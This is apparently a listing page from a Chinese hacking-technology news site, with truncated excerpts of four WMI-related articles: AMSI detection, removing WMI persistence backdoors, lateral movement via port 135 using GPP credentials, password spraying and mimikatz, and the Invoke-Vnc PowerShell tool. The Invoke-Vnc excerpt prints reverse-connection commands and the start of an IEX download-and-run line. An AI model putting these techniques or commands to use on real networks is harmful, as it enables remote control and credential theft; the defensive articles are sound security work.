记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

反恶意软件扫描接口检测分析方法论: 用于 WMI 的 AMSI 识别与分析

简介及目标AMSI 为终端安全服务提供商提供了一个非常棒的接口,能够让提供商从他们所选择的内容扫描的组件中深入了解内存缓冲区。 微软提供了以下组件列表,这些组件选择使用 AMSI:· 用户帐户控制或 UAC (EXE、 COM、 MSI 或 ActiveX 安装时的权限提升)· Powershell (脚本、交互式使用和动态代码权限提升)· Windows Script Host (wscript.exe and cscript.exe)· JavaScript 和 VBScript· Office VBA 宏作为一名从事侦查工程的防御者和一名对成熟
发布时间:2019-10-18 13:10 | 阅读:20593 | 评论:0 | 标签:二进制安全 安全工具 系统安全 AMSI WMI 扫描

如何检测并清除WMI持久化后门

概述WMI(Windows Management Instrumentation)事件订阅(Event Subscription)是一种非常流行的终端持久化技术。我们针对Empire的WMI模块( https://github.com/EmpireProject/Empire )进行了尝试,并对其模块进行分析,同时还汇总了可用于查看和删除WMI事件订阅的PowerShell命令。本文将主要阐述如何检测WMI持久化后门并进行移除。“WMI事件订阅”在MITRE ATT&CK技术中的编号为T1084,详情请参见: https://attack.mitre.org/wiki/Technique/T1084 。攻击者可
发布时间:2019-01-08 12:20 | 阅读:97340 | 评论:0 | 标签:技术 WMI 后门

内网只开135端口如何横向移动?

在一次渗透时,我通过GPP漏洞拿到一个本地管理员组的账户跟密码,我计划是准备撞号攻击(使用同一账户密码,在内网批量登录),批量登录主机之后使用mimikatz抓取lsass.exe进程的明文密码及hash,拖回本地看看是否域管理员存在。远程执行命令方式既然要抓密码,肯定需要远程执行命令,首先我们在看看远程登录WIN主机执行命令有几种方式。· IPC$+AT· PSEXEC· WMI· Winrm远程执行命令需要条件我们来看这些命令的方式,都需要哪些端口。IPC$+AT  445PSEXEC   445WMI   
发布时间:2018-05-25 12:20 | 阅读:141939 | 评论:0 | 标签:内网渗透 技术 WMI 移动

Invoke-Vnc:powershell vnc注入工具

项目主页 https://github.com/artkond/Invoke-Vnc 项目简介 Invoke-Vnc在内存中执行VNC代理,并启动反向连接或绑定到指定的端口。 支持密码验证。 使用 本地调用: Import-Module Invoke-Vnc.ps1 #Reverse VNC connection Invoke-Vnc -ConType reverse -IpAddress <backconnect_ip> -Port 5500 -Password P@ssw0rd #Bind VNC connection Invoke-Vnc -ConType bind -Port 5900 -Password P@ssw0rd 网络调用: IEX (New-Object System.N
发布时间:2017-02-10 21:00 | 阅读:124883 | 评论:0 | 标签:工具 Invoke-Vnc powershell vnc注入 VNC代理 WMI 反向连接 注入

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云